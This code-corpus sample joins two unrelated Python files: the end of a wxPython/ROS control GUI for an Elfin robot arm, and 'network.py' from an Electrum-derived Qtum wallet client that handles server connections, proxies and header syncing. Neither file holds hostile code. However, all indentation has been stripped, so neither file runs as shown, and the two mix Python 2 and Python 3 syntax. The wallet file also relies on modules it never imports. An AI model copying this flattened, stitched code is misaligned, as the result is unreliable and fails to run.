# 20201201: add function for processing value
def process_DI_btn(self,value):
if self.DI_show_lock.acquire():
if value > 0:
for i in range(0,8):
tmp = (value >> (16 + i)) & 0x01
self.DI_show[i]=tmp
else:
self.DI_show = [0,0,0,0,0,0,0,0]
self.DI_show_lock.release()
# 20201201: add function to read DI.
def call_read_DI_command(self):
try:
client = self.call_read_di
val = client.call(self.call_read_di_req).digital_input
self.process_DI_btn(val)
except rospy.ServiceException, e:
resp=ElfinIODReadResponse()
resp.digital_input=0x0000
# 20201202: add function to read DO and DI.
def monitor_DO_DI(self,evt):
self.call_read_DI_command()
self.call_read_DO_command()
# 20201126: add function to write DO.
def call_write_DO_command(self, event, marker, client):
self.justification_DO_btn(marker)
request = 0
try:
self.DO_btn_lock.acquire()
for i in range(0,8):
request = request + self.DO_btn[i]*pow(2,i)
resp=client.call(request << 12)
self.DO_btn_lock.release()
except rospy.ServiceException, e:
self.DO_btn_lock.release()
resp=ElfinIODWriteResponse()
resp.success=False
self.justification_DO_btn(marker)
rp=SetBoolResponse()
rp.success=False
rp.message='no such service for DO control'
wx.CallAfter(self.update_reply_show, rp)
# 20201127: add justification to DO_btn
def justification_DO_btn(self,marker):
self.DO_btn_lock.acquire()
if 0 == self.DO_btn[marker]:
self.DO_btn[marker] = 1
else:
self.DO_btn[marker] = 0
self.DO_btn_lock.release()
# 20201201: add function to set DO_btn colour
def set_DO_btn_colour(self):
self.DO_btn_lock.acquire()
for i in range(0,4):
if 0 == self.DO_btn[i]:
self.DO_btn_display[i].SetBackgroundColour(wx.NullColour)
else:
self.DO_btn_display[i].SetBackgroundColour(wx.Colour(200,225,200))
self.DO_btn_lock.release()
# 20201201: add function to set DI_show colour
def set_DI_show_colour(self):
self.DI_show_lock.acquire()
for i in range(0,4):
if 0 == self.DI_show[i]:
self.DI_display[i].SetBackgroundColour(wx.NullColour)
else:
self.DI_display[i].SetBackgroundColour(wx.Colour(200,225,200))
self.DI_show_lock.release()
# 20201207: add function to set LED colour
def set_LED_show_colour(self):
self.DO_btn_lock.acquire()
for i in range(4,8):
if 0 == self.DO_btn[i]:
self.LED_display[i-4].SetBackgroundColour(wx.NullColour)
else:
self.LED_display[i-4].SetBackgroundColour(wx.Colour(200,225,200))
self.DO_btn_lock.release()
# 20201207: add function to set End_btn colour
def set_End_btn_colour(self):
self.DI_show_lock.acquire()
for i in range(4,8):
if 0 == self.DI_show[i]:
png=wx.Image(self.btn_path+'/btn_icon/End_btn'+str(i-4)+'_low.png',wx.BITMAP_TYPE_PNG)
self.End_btn_display[i-4].SetBitmap(wx.BitmapFromImage(png))
else:
png=wx.Image(self.btn_path+'/btn_icon/End_btn'+str(i-4)+'_high.png',wx.BITMAP_TYPE_PNG)
self.End_btn_display[i-4].SetBitmap(wx.BitmapFromImage(png))
self.DI_show_lock.release()
def set_color(self, evt):
wx.CallAfter(self.set_DO_btn_colour)
wx.CallAfter(self.set_DI_show_colour)
wx.CallAfter(self.set_LED_show_colour)
wx.CallAfter(self.set_End_btn_colour)
def show_message_dialog(self, message, cl, rq):
msg='executing ['+message+']'
self.dlg_label.SetLabel(msg)
lable_size=[]
lable_size.append(self.dlg_label.GetSize()[0])
lable_size.append(self.dlg_label.GetSize()[1])
self.dlg.SetSize((lable_size[0]+30, lable_size[1]+30))
t=threading.Thread(target=self.thread_bg, args=(message, cl, rq,))
t.start()
def show_dialog(self):
self.dlg.SetPosition((self.GetPosition()[0]+250,
self.GetPosition()[1]+250))
self.dlg.ShowModal()
def destroy_dialog(self):
self.dlg.EndModal(0)
def closewindow(self,event):
pass
def show_set_links_dialog(self, evt):
self.sld_ref_link_show.SetValue(self.ref_link_name)
self.sld_end_link_show.SetValue(self.end_link_name)
self.set_links_dlg.SetPosition((self.GetPosition()[0]+150,
self.GetPosition()[1]+250))
self.set_links_dlg.ShowModal()
def update_ref_link(self, evt):
request=SetStringRequest()
request.data=self.sld_ref_link_show.GetValue()
resp=self.call_set_ref_link.call(request)
wx.CallAfter(self.update_reply_show, resp)
def update_end_link(self, evt):
request=SetStringRequest()
request.data=self.sld_end_link_show.GetValue()
resp=self.call_set_end_link.call(request)
wx.CallAfter(self.update_reply_show, resp)
def updateDisplay(self, msg):
for i in xrange(len(self.js_display)):
self.js_display[i].SetValue(msg[i])
for i in xrange(len(self.ps_display)):
self.ps_display[i].SetValue(msg[i+6])
if self.ref_link_lock.acquire():
ref_link=self.ref_link_name
self.ref_link_lock.release()
if self.end_link_lock.acquire():
end_link=self.end_link_name
self.end_link_lock.release()
self.ref_link_show.SetValue(ref_link)
self.end_link_show.SetValue(end_link)
def update_reply_show(self,msg):
if msg.success:
self.reply_show.SetBackgroundColour(wx.Colour(200, 225, 200))
else:
self.reply_show.SetBackgroundColour(wx.Colour(225, 200, 200))
self.reply_show.SetValue(msg.message)
def update_servo_state(self, msg):
if msg.data:
self.servo_state_show.SetBackgroundColour(wx.Colour(200, 225, 200))
self.servo_state_show.SetValue('Enabled')
else:
self.servo_state_show.SetBackgroundColour(wx.Colour(225, 200, 200))
self.servo_state_show.SetValue('Disabled')
def update_fault_state(self, msg):
if msg.data:
self.fault_state_show.SetBackgroundColour(wx.Colour(225, 200, 200))
self.fault_state_show.SetValue('Warning')
else:
self.fault_state_show.SetBackgroundColour(wx.Colour(200, 225, 200))
self.fault_state_show.SetValue('No Fault')
def update_velocity_scaling_show(self, msg):
self.velocity_setting_show.SetValue(str(round(msg, 2)*100)+'%') # 20201127: change the show format
def js_call_back(self, data):
while not rospy.is_shutdown():
try:
self.listener.waitForTransform(self.group.get_planning_frame(),
self.group.get_end_effector_link(),
rospy.Time(0), rospy.Duration(100))
(xyz,qua) = self.listener.lookupTransform(self.group.get_planning_frame(),
self.group.get_end_effector_link(),
rospy.Time(0))
break
except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException):
continue
rpy=tf.transformations.euler_from_quaternion(qua)
for i in xrange(len(data.position)):
self.key.append(str(round(data.position[i]*180/math.pi, 2)))
self.key.append(str(round(xyz[0]*1000, 2)))
self.key.append(str(round(xyz[1]*1000, 2)))
self.key.append(str(round(xyz[2]*1000, 2)))
self.key.append(str(round(rpy[0]*180/math.pi, 2)))
self.key.append(str(round(rpy[1]*180/math.pi, 2)))
self.key.append(str(round(rpy[2]*180/math.pi, 2)))
wx.CallAfter(self.updateDisplay, self.key)
self.key=[]
def monitor_status(self, evt):
self.key=[]
current_joint_values=self.group.get_current_joint_values()
for i in xrange(len(current_joint_values)):
self.key.append(str(round(current_joint_values[i]*180/math.pi, 2)))
if self.ref_link_lock.acquire():
ref_link=self.ref_link_name
self.ref_link_lock.release()
if self.end_link_lock.acquire():
end_link=self.end_link_name
self.end_link_lock.release()
while not rospy.is_shutdown():
try:
self.listener.waitForTransform(ref_link, end_link, rospy.Time(0), rospy.Duration(100))
(xyz,qua) = self.listener.lookupTransform(ref_link, end_link, rospy.Time(0))
break
except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException):
continue
rpy=tf.transformations.euler_from_quaternion(qua)
self.key.append(str(round(xyz[0]*1000, 2)))
self.key.append(str(round(xyz[1]*1000, 2)))
self.key.append(str(round(xyz[2]*1000, 2)))
self.key.append(str(round(rpy[0]*180/math.pi, 2)))
self.key.append(str(round(rpy[1]*180/math.pi, 2)))
self.key.append(str(round(rpy[2]*180/math.pi, 2)))
wx.CallAfter(self.updateDisplay, self.key)
def servo_state_cb(self, data):
if self.servo_state_lock.acquire():
self.servo_state=data.data
self.servo_state_lock.release()
wx.CallAfter(self.update_servo_state, data)
def fault_state_cb(self, data):
if self.fault_state_lock.acquire():
self.fault_state=data.data
self.fault_state_lock.release()
wx.CallAfter(self.update_fault_state, data)
def ref_link_name_cb(self, data):
if self.ref_link_lock.acquire():
self.ref_link_name=data.data
self.ref_link_lock.release()
def end_link_name_cb(self, data):
if self.end_link_lock.acquire():
self.end_link_name=data.data
self.end_link_lock.release()
def listen(self):
rospy.Subscriber(self.elfin_driver_ns+'enable_state', Bool, self.servo_state_cb)
rospy.Subscriber(self.elfin_driver_ns+'fault_state', Bool, self.fault_state_cb)
rospy.Subscriber(self.elfin_basic_api_ns+'reference_link_name', String, self.ref_link_name_cb)
rospy.Subscriber(self.elfin_basic_api_ns+'end_link_name', String, self.end_link_name_cb)
rospy.Timer(rospy.Duration(nsecs=50000000), self.monitor_DO_DI)
rospy.Timer(rospy.Duration(nsecs=50000000), self.set_color)
rospy.Timer(rospy.Duration(nsecs=50000000), self.monitor_status)
if __name__=='__main__':
rospy.init_node('elfin_gui')
app=wx.App(False)
myframe=MyFrame(parent=None,id=-1)
myframe.Show(True)
myframe.listen()
app.MainLoop()
|
network.py
|
# Electrum - Lightweight Bitcoin Client
# Copyright (c) 2011-2016 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import errno
import queue
import random
import select
import socket
import threading
import time
from collections import defaultdict
import socks
from . import bitcoin
from . import blockchain
from . import util
from .qtum import *
from .interface import Connection, Interface
from .version import ELECTRUM_VERSION, PROTOCOL_VERSION
NODES_RETRY_INTERVAL = 60
SERVER_RETRY_INTERVAL = 10
def parse_servers(result):
""" parse servers list into dict format"""
servers = {}
for item in result:
host = item[1]
out = {}
version = None
pruning_level = '-'
if len(item) > 2:
for v in item[2]:
if re.match("[st]\d*", v):
protocol, port = v[0], v[1:]
if port == '': port = DEFAULT_PORTS[protocol]
out[protocol] = port
elif re.match("v(.?)+", v):
version = v[1:]
elif re.match("p\d*", v):
pruning_level = v[1:]
if pruning_level == '': pruning_level = '0'
if out:
out['pruning'] = pruning_level
out['version'] = version
servers[host] = out
return servers
def filter_version(servers):
def is_recent(version):
try:
return util.normalize_version(version) >= util.normalize_version(PROTOCOL_VERSION)
except Exception as e:
return False
return {k: v for k, v in servers.items() if is_recent(v.get('version'))}
def filter_protocol(hostmap, protocol = 's'):
'''Filters the hostmap for those implementing protocol.
The result is a list in serialized form.'''
eligible = []
for host, portmap in hostmap.items():
port = portmap.get(protocol)
if port:
eligible.append(serialize_server(host, port, protocol))
return eligible
def pick_random_server(hostmap = None, protocol = 's', exclude_set = set()):
from .qtum import DEFAULT_SERVERS
if hostmap is None:
hostmap = DEFAULT_SERVERS
eligible = list(set(filter_protocol(hostmap, protocol)) - exclude_set)
return random.choice(eligible) if eligible else None
from .simple_config import SimpleConfig
proxy_modes = ['socks4', 'socks5', 'http']
def serialize_proxy(p):
if not isinstance(p, dict):
return None
return ':'.join([p.get('mode'), p.get('host'), p.get('port'), p.get('user', ''), p.get('password', '')])
def deserialize_proxy(s):
if not isinstance(s, str):
return None
if s.lower() == 'none':
return None
proxy = { "mode":"socks5", "host":"localhost" }
args = s.split(':')
n = 0
if proxy_modes.count(args[n]) == 1:
proxy["mode"] = args[n]
n += 1
if len(args) > n:
proxy["host"] = args[n]
n += 1
if len(args) > n:
proxy["port"] = args[n]
n += 1
else:
proxy["port"] = "8080" if proxy["mode"] == "http" else "1080"
if len(args) > n:
proxy["user"] = args[n]
n += 1
if len(args) > n:
proxy["password"] = args[n]
return proxy
def deserialize_server(server_str):
host, port, protocol = str(server_str).rsplit(':', 2)
assert protocol in 'st'
int(port) # Throw if cannot be converted to int
return host, port, protocol
def serialize_server(host, port, protocol):
return str(':'.join([host, port, protocol]))
class Network(util.DaemonThread):
"""The Network class manages a set of connections to remote qtum_electrum
servers, each connected socket is handled by an Interface() object.
Connections are initiated by a Connection() thread which stops once
the connection succeeds or fails.
Our external API:
- Member functions get_header(), get_interfaces(), get_local_height(),
get_parameters(), get_server_height(), get_status_value(),
is_connected(), set_parameters(), stop()
"""
def __init__(self, config=None):
if config is None:
config = {} # Do not use mutables as default values!
util.DaemonThread.__init__(self)
self.config = SimpleConfig(config) if isinstance(config, dict) else config
self.num_server = 10 if not self.config.get('oneserver') else 0
self.blockchains = blockchain.read_blockchains(self.config)
self.print_error("blockchains", self.blockchains.keys())
self.blockchain_index = config.get('blockchain_index', 0)
if self.blockchain_index not in self.blockchains.keys():
self.blockchain_index = 0
# Server for addresses and transactions
self.default_server = self.config.get('server', None)
# Sanitize default server
if self.default_server:
try:
deserialize_server(self.default_server)
except:
self.print_error('Warning: failed to parse server-string; falling back to random.')
self.default_server = None
if not self.default_server:
self.default_server = pick_random_server()
self.lock = threading.Lock()
self.pending_sends = []
self.message_id = 0
self.debug = False
self.irc_servers = {} # returned by interface (list from irc)
self.recent_servers = self.read_recent_servers()
self.banner = ''
self.donation_address = ''
self.relay_fee = None
# callbacks passed with subscriptions
self.subscriptions = defaultdict(list)
self.sub_cache = {}
# callbacks set by the GUI
self.callbacks = defaultdict(list)
self.downloading_headers = False
dir_path = os.path.join(self.config.path, 'certs')
if not os.path.exists(dir_path):
os.mkdir(dir_path)
# subscriptions and requests
self.subscribed_addresses = set()
self.h2addr = {}
# Requests from client we've not seen a response to
self.unanswered_requests = {}
# retry times
self.server_retry_time = time.time()
self.nodes_retry_time = time.time()
# kick off the network. interface is the main server we are currently
# communicating with. interfaces is the set of servers we are connecting
# to or have an ongoing connection with
self.interface = None
self.interfaces = {}
self.auto_connect = self.config.get('auto_connect', True)
self.connecting = set()
self.requested_chunks = set()
self.socket_queue = queue.Queue()
self.start_network(deserialize_server(self.default_server)[2],
deserialize_proxy(self.config.get('proxy')))
def register_callback(self, callback, events):
with self.lock:
for event in events:
self.callbacks[event].append(callback)
def unregister_callback(self, callback):
with self.lock:
for callbacks in self.callbacks.values():
if callback in callbacks:
callbacks.remove(callback)
def trigger_callback(self, event, *args):
with self.lock:
callbacks = self.callbacks[event][:]
[callback(event, *args) for callback in callbacks]
def read_recent_servers(self):
if not self.config.path:
return []
path = os.path.join(self.config.path, "recent_servers")
try:
with open(path, "r") as f:
data = f.read()
return json.loads(data)
except:
return []
def save_recent_servers(self):
if not self.config.path:
return
path = os.path.join(self.config.path, "recent_servers")
s = json.dumps(self.recent_servers, indent=4, sort_keys=True)
try:
with open(path, "w") as f:
f.write(s)
except:
pass
def get_server_height(self):
return self.interface.tip if self.interface else 0
def server_is_lagging(self):
sh = self.get_server_height()
if not sh:
self.print_error('no height for main interface')
return True
lh = self.get_local_height()
result = (lh - sh) > 1
if result:
self.print_error('%s is lagging (%d vs %d)' % (self.default_server, sh, lh))
for k in list(self.blockchains.keys()):
if not self.blockchains[k].is_valid():
for server in list(self.interfaces.keys()):
interface = self.interfaces[server]
if interface.blockchain and interface.blockchain is self.blockchains[k]:
self.close_interface(interface)
del self.blockchains[k]
return result
def set_status(self, status):
self.connection_status = status
self.notify('status')
def is_connected(self):
return self.interface is not None
def is_connecting(self):
return self.connection_status == 'connecting'
def is_up_to_date(self):
return self.unanswered_requests == {}
def queue_request(self, method, params, interface=None):
# If you want to queue a request on any interface it must go
# through this function so message ids are properly tracked
if interface is None:
interface = self.interface
message_id = self.message_id
self.message_id += 1
if self.debug:
self.print_error(interface.host, "-->", method, params, message_id)
interface.queue_request(method, params, message_id)
return message_id
def send_subscriptions(self):
self.print_error('sending subscriptions to', self.interface.server, len(self.unanswered_requests), len(self.subscribed_addresses))
self.sub_cache.clear()
# Resend unanswered requests
requests = self.unanswered_requests.values()
self.unanswered_requests = {}
if self.interface.ping_required():
params = [ELECTRUM_VERSION, PROTOCOL_VERSION]
self.queue_request('server.version', params, self.interface)
for request in requests:
message_id = self.queue_request(request[0], request[1])
self.unanswered_requests[message_id] = request
self.queue_request('server.banner', [])
# self.queue_request('server.donation_address', [])
self.queue_request('server.peers.subscribe', [])
for i in bitcoin.FEE_TARGETS:
self.queue_request('blockchain.estimatefee', [i])
self.queue_request('blockchain.relayfee', [])
for h in self.subscribed_addresses:
self.queue_request('blockchain.scripthash.subscribe', [h])
def get_status_value(self, key):
if key == 'status':
value = self.connection_status
elif key == 'banner':
value = self.banner
elif key == 'fee':
value = self.config.fee_estimates
elif key == 'updated':
value = (self.get_local_height(), self.get_server_height())
elif key == 'servers':
value = self.get_servers()
elif key == 'interfaces':
value = self.get_interfaces()
return value
def notify(self, key):
if key in ['status', 'updated']:
self.trigger_callback(key)
else:
self.trigger_callback(key, self.get_status_value(key))
def get_parameters(self):
host, port, protocol = deserialize_server(self.default_server)
return host, port, protocol, self.proxy, self.auto_connect
def get_donation_address(self):
if self.is_connected():
return self.donation_address
def get_interfaces(self):
'''The interfaces that are in connected state'''
return list(self.interfaces.keys())
def get_servers(self):
from .qtum import DEFAULT_SERVERS
out = DEFAULT_SERVERS
if self.irc_servers:
out.update(filter_version(self.irc_servers.copy()))
else:
for s in self.recent_servers:
try:
host, port, protocol = deserialize_server(s)
except:
continue
if host not in out:
out[host] = { protocol:port }
return out
def start_interface(self, server):
if (not server in self.interfaces and not server in self.connecting):
if server == self.default_server:
self.print_error("connecting to %s as new interface" % server)
self.set_status('connecting')
self.connecting.add(server)
c = Connection(server, self.socket_queue, self.config.path)
def start_random_interface(self):
exclude_set = self.disconnected_servers.union(set(self.interfaces))
server = pick_random_server(self.get_servers(), self.protocol, exclude_set)
if server:
self.start_interface(server)
def start_interfaces(self):
self.start_interface(self.default_server)
for i in range(self.num_server - 1):
self.start_random_interface()
def set_proxy(self, proxy):
self.proxy = proxy
# Store these somewhere so we can un-monkey-patch
if not hasattr(socket, "_socketobject"):
socket._socketobject = socket.socket
socket._getaddrinfo = socket.getaddrinfo
if proxy:
self.print_error('setting proxy', proxy)
proxy_mode = proxy_modes.index(proxy["mode"]) + 1
socks.setdefaultproxy(proxy_mode,
proxy["host"],
int(proxy["port"]),
# socks.py seems to want either None or a non-empty string
username=(proxy.get("user", "") or None),
password=(proxy.get("password", "") or None))
socket.socket = socks.socksocket
# prevent dns leaks, see http://stackoverflow.com/questions/13184205/dns-over-proxy
socket.getaddrinfo = lambda *args: [(socket.AF_INET, socket.SOCK_STREAM, 6, '', (args[0], args[1]))]
else:
socket.socket = socket._socketobject
socket.getaddrinfo = socket._getaddrinfo
def start_network(self, protocol, proxy):
assert not self.interface and not self.interfaces
assert not self.connecting and self.socket_queue.empty()
self.print_error('starting network')
self.disconnected_servers = set([])
self.protocol = protocol
self.set_proxy(proxy)
self.start_interfaces()
def stop_network(self):
self.print_error("stopping network")
for interface in list(self.interfaces.values()):
self.close_interface(interface)
if self.interface:
self.close_interface(self.interface)
assert self.interface is None
assert not self.interfaces
self.connecting = set()
# Get a new queue - no old pending connections thanks!
self.socket_queue = queue.Queue()
def set_parameters(self, host, port, protocol, proxy, auto_connect):
proxy_str = serialize_proxy(proxy)
server = serialize_server(host, port, protocol)
# sanitize parameters
try:
deserialize_server(serialize_server(host, port, protocol))
if proxy:
proxy_modes.index(proxy["mode"]) + 1
int(proxy['port'])
except:
return
self.config.set_key('auto_connect', auto_connect, False)
self.config.set_key("proxy", proxy_str, False)
self.config.set_key("server", server, True)
# abort if changes were not allowed by config
if self.config.get('server') != server or self.config.get('proxy') != proxy_str:
return
self.auto_connect = auto_connect
if self.proxy != proxy or self.protocol != protocol:
# Restart the network defaulting to the given server
self.stop_network()
self.default_server = server
self.start_network(protocol, proxy)
elif self.default_server != server:
self.switch_to_interface(server)
else:
self.switch_lagging_interface()
self.notify('updated')
def switch_to_random_interface(self):
'''Switch to a random connected server other than the current one'''
servers = self.get_interfaces() # Those in connected state
if self.default_server in servers:
servers.remove(self.default_server)
if servers:
self.switch_to_interface(random.choice(servers))
def switch_lagging_interface(self):
'''If auto_connect and lagging, switch interface'''
if self.server_is_lagging() and self.auto_connect:
# switch to one that has the correct header (not height)
header = self.blockchain().read_header(self.get_local_height())
filtered = list(map(lambda x:x[0], filter(lambda x: x[1].tip_header==header, self.interfaces.items())))
if filtered:
choice = random.choice(filtered)
self.switch_to_interface(choice)
def switch_to_interface(self, server):
'''Switch to server as our interface. If no connection exists nor
being opened, start a thread to connect. The actual switch will
happen on receipt of the connection notification. Do nothing
if server already is our interface.'''
self.default_server = server
if server not in self.interfaces:
self.interface = None
self.start_interface(server)
return
i = self.interfaces[server]
if self.interface != i:
self.print_error("switching to", server)
# stop any current interface in order to terminate subscriptions
# fixme: we don't want to close headers sub
#self.close_interface(self.interface)
self.interface = i
self.send_subscriptions()
self.set_status('connected')
self.notify('updated')
def close_interface(self, interface):
if interface:
if interface.server in self.interfaces:
self.interfaces.pop(interface.server)
if interface.server == self.default_server:
self.interface = None
interface.close()
def add_recent_server(self, server):
# list is ordered
if server in self.recent_servers:
self.recent_servers.remove(server)
self.recent_servers.insert(0, server)
self.recent_servers = self.recent_servers[0:20]
self.save_recent_servers()
def process_response(self, interface, response, callbacks):
if self.debug:
self.print_error("<--", response)
error = response.get('error')
result = response.get('result')
method = response.get('method')
params = response.get('params')
# We handle some responses; return the rest to the client.
if method == 'server.version':
interface.server_version = result
elif method == 'blockchain.headers.subscribe':
if error is None:
self.on_notify_header(interface, result)
elif method == 'server.peers.subscribe':
if error is None:
self.irc_servers = parse_servers(result)
self.notify('servers')
elif method == 'server.banner':
if error is None:
self.banner = result
self.notify('banner')
elif method == 'server.donation_address':
if error is None:
self.donation_address = result
elif method == 'blockchain.estimatefee':
if error is None and result > 0:
i = params[0]
fee = int(result*COIN)
self.config.fee_estimates[i] = fee
self.print_error("fee_estimates[%d]" % i, fee)
self.notify('fee')
elif method == 'blockchain.relayfee':
if error is None:
self.relay_fee = int(result * COIN)
self.print_error("relayfee", self.relay_fee)
elif method == 'blockchain.block.get_chunk':
self.on_get_chunk(interface, response)
elif method == 'blockchain.block.get_header':
self.on_get_header(interface, response)
for callback in callbacks:
callback(response)
def get_index(self, method, params):
""" hashable index for subscriptions and cache"""
return str(method) + (':' + str(params[0]) if params else '')
def process_responses(self, interface):
responses = interface.get_responses()
for request, response in responses:
if request:
method, params, message_id = request
k = self.get_index(method, params)
# client requests go through self.send() with a
# callback, are only sent to the current interface,
# and are placed in the unanswered_requests dictionary
client_req = self.unanswered_requests.pop(message_id, None)
if client_req:
assert interface == self.interface
callbacks = [client_req[2]]
else:
# fixme: will only work for subscriptions
k = self.get_index(method, params)
callbacks = self.subscriptions.get(k, [])
# Copy the request method and params to the response
response['method'] = method
response['params'] = params
# Only once we've received a response to an addr subscription
# add it to the list; avoids double-sends on reconnection
if method == 'blockchain.scripthash.subscribe':
self.subscribed_addresses.add(params[0])
else:
if not response: # Closed remotely / misbehaving
self.connection_down(interface.server)
break
# Rewrite response shape to match subscription request response
method = response.get('method')
params = response.get('params')
k = self.get_index(method, params)
if method == 'blockchain.headers.subscribe':
response['result'] = params[0]
response['params'] = []
elif method == 'blockchain.scripthash.subscribe':
response['params'] = [params[0]] # addr
response['result'] = params[1]
callbacks = self.subscriptions.get(k, [])
# update cache if it's a subscription
if method.endswith('.subscribe'):
self.sub_cache[k] = response
# Response is now in canonical form
self.process_response(interface, response, callbacks)
def addr_to_scripthash(self, addr):
h = bitcoin.address_to_scripthash(addr)
if h not in self.h2addr:
self.h2addr[h] = addr
return h
def overload_cb(self, callback):
def cb2(x):
x2 = x.copy()
p = x2.pop('params')
addr = self.h2addr[p[0]]
x2['params'] = [addr]
callback(x2)
return cb2
def subscribe_to_addresses(self, addresses, callback):
hashes = [self.addr_to_scripthash(addr) for addr in addresses]
msgs = [('blockchain.scripthash.subscribe', [x]) for x in hashes]
self.send(msgs, self.overload_cb(callback))
def request_address_history(self, address, callback):
h = self.addr_to_scripthash(address)
self.send([('blockchain.scripthash.get_history', [h])], self.overload_cb(callback))
def send(self, messages, callback):
'''Messages is a list of (method, params) tuples'''
messages = list(messages)
with self.lock:
self.pending_sends.append((messages, callback))
def process_pending_sends(self):
# Requests needs connectivity. If we don't have an interface,
# we cannot process them.
if not self.interface:
return
with self.lock:
sends = self.pending_sends
self.pending_sends = []
for messages, callback in sends:
for method, params in messages:
r = None
if method.endswith('.subscribe'):
k = self.get_index(method, params)
# add callback to list
l = self.subscriptions.get(k, [])
if callback not in l:
l.append(callback)
self.subscriptions[k] = l
# check cached response for subscriptions
r = self.sub_cache.get(k)
if r is not None:
util.print_error("cache hit", k)
callback(r)
else:
message_id = self.queue_request(method, params)
self.unanswered_requests[message_id] = method, params, callback
def unsubscribe(self, callback):
'''Unsubscribe a callback to free object references to enable GC.'''
# Note: we can't unsubscribe from the server, so if we receive
# subsequent notifications process_response() will emit a harmless
# "received unexpected notification" warning
with self.lock:
for v in self.subscriptions.values():
if callback in v:
v.remove(callback)
def connection_down(self, server):
'''A connection to server either went down, or was never made.
We distinguish by whether it is in self.interfaces.'''
self.disconnected_servers.add(server)
if server == self.default_server:
self.set_status('disconnected')
if server in self.interfaces:
self.close_interface(self.interfaces[server])
self.notify('interfaces')
for b in self.blockchains.values():
if b.catch_up == server:
b.catch_up = None
def new_interface(self, server, socket):
# todo: get tip first, then decide which checkpoint to use.
self.add_recent_server(server)
interface = Interface(server, socket)
interface.blockchain = None
interface.tip_header = None
interface.tip = 0
interface.mode = 'default'
interface.request = None
self.interfaces[server] = interface
self.queue_request('blockchain.headers.subscribe', [], interface)
if server == self.default_server:
self.switch_to_interface(server)
#self.notify('interfaces')
def maintain_sockets(self):
'''Socket maintenance.'''
# Responses to connection attempts?
while not self.socket_queue.empty():
server, socket = self.socket_queue.get()
if server in self.connecting:
self.connecting.remove(server)
if socket:
self.new_interface(server, socket)
else:
self.connection_down(server)
# Send pings and shut down stale interfaces
# must use copy of values
for interface in list(self.interfaces.values()):
if interface.has_timed_out():
self.connection_down(interface.server)
elif interface.ping_required():
params = [ELECTRUM_VERSION, PROTOCOL_VERSION]
self.queue_request('server.version', params, interface)
now = time.time()
# nodes
if len(self.interfaces) + len(self.connecting) < self.num_server:
self.start_random_interface()
if now - self.nodes_retry_time > NODES_RETRY_INTERVAL:
self.print_error('network: retrying connections')
self.disconnected_servers = set([])
self.nodes_retry_time = now
# main interface
if not self.is_connected():
if self.auto_connect:
if not self.is_connecting():
self.switch_to_random_interface()
else:
if self.default_server in self.disconnected_servers:
if now - self.server_retry_time > SERVER_RETRY_INTERVAL:
self.disconnected_servers.remove(self.default_server)
self.server_retry_time = now
else:
self.switch_to_interface(self.default_server)
def request_chunk(self, interface, index):
if index in self.requested_chunks:
return
interface.print_error("requesting chunk %d" % index)
self.queue_request('blockchain.block.get_chunk', [index], interface)
self.requested_chunks.add(index)
def on_get_chunk(self, interface, response):
'''Handle receiving a chunk of block headers'''
error = response.get('error')
result = response.get('result')
params = response.get('params')
if result is None or params is None or error is not None:
print_error('on get chunk error', error, result, params)
return
index = params[0]
# Ignore unsolicited chunks
if index not in self.requested_chunks:
interface.print_error("received chunk %d (unsolicited)" % index)
return
else:
interface.print_error("received chunk %d" % index)
self.requested_chunks.remove(index)
connect = interface.blockchain.connect_chunk(index, result)
# If not finished, get the next chunk
if not connect:
self.connection_down(interface.server)
return
if interface.blockchain.height() < interface.tip:
self.request_chunk(interface, index+1)
else:
interface.request = None
interface.mode = 'default'
interface.print_error('catch up done', interface.blockchain.height())
interface.blockchain.catch_up = None
self.notify('updated')
def request_header(self, interface, height):
#interface.print_error("requesting header %d" % height)
height = max(height, 0)
self.queue_request('blockchain.block.get_header', [height], interface)
interface.request = height
interface.req_time = time.time()
def on_get_header(self, interface, response):
'''Handle receiving a single block header'''
header = response.get('result')
if not header:
interface.print_error(response)
self.connection_down(interface.server)
return
height = header.get('block_height')
# print_error('[on_get_header] {} {}'.format(height, interface.mode))
if interface.request != height:
interface.print_error("unsolicited header", interface.request, height)
self.connection_down(interface.server)
return
chain = blockchain.check_header(header)
if interface.mode == 'backward':
if chain:
interface.print_error("binary search")
interface.mode = 'binary'
interface.blockchain = chain
interface.good = height
next_height = (interface.bad + interface.good) // 2
else:
if height == 0:
self.connection_down(interface.server)
next_height = None
else:
interface.bad = height
interface.bad_header = header
delta = interface.tip - height
next_height = max(0, interface.tip - 2 * delta)
elif interface.mode == 'binary':
if chain:
interface.good = height
interface.blockchain = chain
else:
interface.bad = height
interface.bad_header = header
if interface.bad != interface.good + 1:
next_height = (interface.bad + interface.good) // 2
elif not interface.blockchain.can_connect(interface.bad_header, check_height=False):
self.connection_down(interface.server)
next_height = None
else:
branch = self.blockchains.get(interface.bad)
if branch is not None:
if branch.check_header(interface.bad_header):
interface.print_error('joining chain', interface.bad)
next_height = None
elif branch.parent().check_header(header):
interface.print_error('reorg', interface.bad, interface.tip)
interface.blockchain = branch.parent()
next_height = None
else:
interface.print_error('checkpoint conflicts with existing fork', branch.path())
branch.write('', 0)
branch.save_header(interface.bad_header)
interface.mode = 'catch_up'
interface.blockchain = branch
next_height = interface.bad + 1
interface.blockchain.catch_up = interface.server
else:
bh = interface.blockchain.height()
next_height = None
if bh > interface.good:
if not interface.blockchain.check_header(interface.bad_header):
b = interface.blockchain.fork(interface.bad_header)
self.blockchains[interface.bad] = b
interface.blockchain = b
interface.print_error("new chain", b.checkpoint)
interface.mode = 'catch_up'
next_height = interface.bad + 1
interface.blockchain.catch_up = interface.server
